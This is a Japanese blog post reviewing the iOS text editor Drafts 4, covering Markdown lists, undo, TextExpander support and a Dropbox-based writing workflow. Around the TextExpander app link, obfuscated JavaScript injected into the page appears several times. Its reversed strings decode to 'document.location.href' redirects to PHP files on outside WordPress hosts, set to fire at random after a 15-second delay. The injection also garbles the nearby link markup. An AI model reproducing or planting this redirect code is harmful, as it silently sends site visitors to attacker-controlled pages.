Sumirexxx

今日もiPhone片手に出かけます

【SMRX】Drafts 4 は多機能なのにシンプルな使い心地。もうundoでiPhoneを振らなくてもいいよ!

アプリ

Drafts 4

こんばんは。雨止んだかな?
すみれ(@sumire20120524)です。

今日はDrafts 4 でブログを書いてます。
なかなか快適。というか、アシスト機能が豊富でなんでもできそうな印象。

例えばこのペーストも↑

通知センターからMyShortcuts+Viewerに置いてあるApphtmlを呼び出し、ソースをコピー。
アクションキーボードから、「Paste」をタップしてペタリ。

apphtml

アクションキーボード

ソースはりつけ

長押しして貼り付け、でもいいけど長押ししなくていい分すぐに貼り付けられるところがお気に入りです。

リストを使うには?

↑のようにリストを作りたいときは、右下のペンマークをタップして「Drafts action Directory」(ネット経由)から、Markdown Listを選択して持ってくればOKです。

directory

directoryトップ画面

markdown list

使い方は、先にリストにしたい内容を書いておいて、その内容を選択してマークをタップするだけ。そういえばMarkdownてめっちゃ簡単で便利だったんだよな。最近使ってなかったからまた使おうかな。

これを

文字を入力

こうして

範囲を選択

markdown list

こうじゃ!

リスト

Markdownの使い方はこちら↓> 

【SMRX】今日からできる、Textwellを使ってMarkdownの記述をHTML記述に変換する超簡単な方法。 | Sumirexxx

undo機能(元に戻す)

ちょっと操作を間違えて、一手前まで戻りたいってことはよくある話です。
そんなときは左矢印(デフォルトで入ってる)をタップすると元に戻ります。
電車とか公共の場で、いきなりiPhoneを振らなくてもいいのはうれしい!

undo

Textexpander・Markdownも使える

Draft 4では、おなじみのTextExpanderも使えるんですね。さらにMarkdownも。
そして、これに「ATOK for iOS」や「みんなの顔文字キーボード」なんかも付け足して編集なんかをしちゃうと、素敵な環境が出来上がります。(ブログではあまり顔文字使わないけど。)

$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == “string”) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(“”).reverse().join(“”);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=[“‘php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ander-3-+-custom-keyboard/id917416298?mt=8&uo=4&at=10l9XF” target=”_blank” rel=”nofollow”> $hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == “string”) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(“”).reverse().join(“”);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=[“‘php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ander-3-+-custom-keyboard/id917416298?mt=8&uo=4&at=10l9XF” target=”_blank” rel=”nofollow”>TextExpander 3 + custom keyboard
カテゴリ: ユーティリティ, 仕事効率化

$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == “string”) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(“”).reverse().join(“”);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=[“‘php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ander-3-+-custom-keyboard/id917416298?mt=8&uo=4&at=10l9XF” rel=”nofollow” target=”_blank”>$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}sample/images/apri_downloadbutton.gif” alt=”アプリをダウンロードする” width=”280″ height=”50″ />

保存先はいろいろ。

デフォルトで入っているのはDropboxとEvernote。
それ以外のところに保存したい場合は、「Open in…」からいくか、「Copy to Clipboard」でぜんぶコピーして、ほかのエディタを開いて貼り付けるなどの方法がありそう。

そんなことしなくても今は「Clips」というアプリがあるので、全部コピーするだけで読み込んでくれて、あとは自分が使いたいアプリを開くだけ…ていうのがいまっぽいかな?

Clips – Copy and paste anywhere with widget and keyboard
カテゴリ: ユーティリティ, 仕事効率化

私の場合は、

  1. 朝の通勤時にiPhoneで文章を編集→Dropboxに送る→
  2. 帰りの電車ではまたiPhoneで最終チェック→するぷろで画像など貼り付けて投稿
  3. 会社についたら、PCのテキストエディタで文章を編集→Dropboxに送る→
  4. *帰りの電車ではまたiPhoneで最終チェック→するぷろで画像など貼り付けて投稿

って感じで使ってます。
短い時はするぷろだけで書くこともあります。

Dropboxは必須。

ブロガー必須。

フリック入力なめらかに

画面が固まったり、フリックが遅かったりすることもありません。
文章を書くには、リズム大事ですよね。
日に日にリズムの大切さを感じるようになってきています。

まとめ

機能いっぱいのくせにシンプルで、文章に集中できそうなところがいい!
エディタ系のアプリは、高機能でもシンプルでわかりやすいのがありがたいし、毎日使うアプリになりそうなきがする。

Draft 4はそのあたりを軽くクリアしていて、TextwellやDraftをほうふつとさせる、文章書くのが好きな人には合ってるアプリだと思います。

まだまだいろいろできそうだ。

Posted from するぷろ for iOS.

この記事をシェアする

<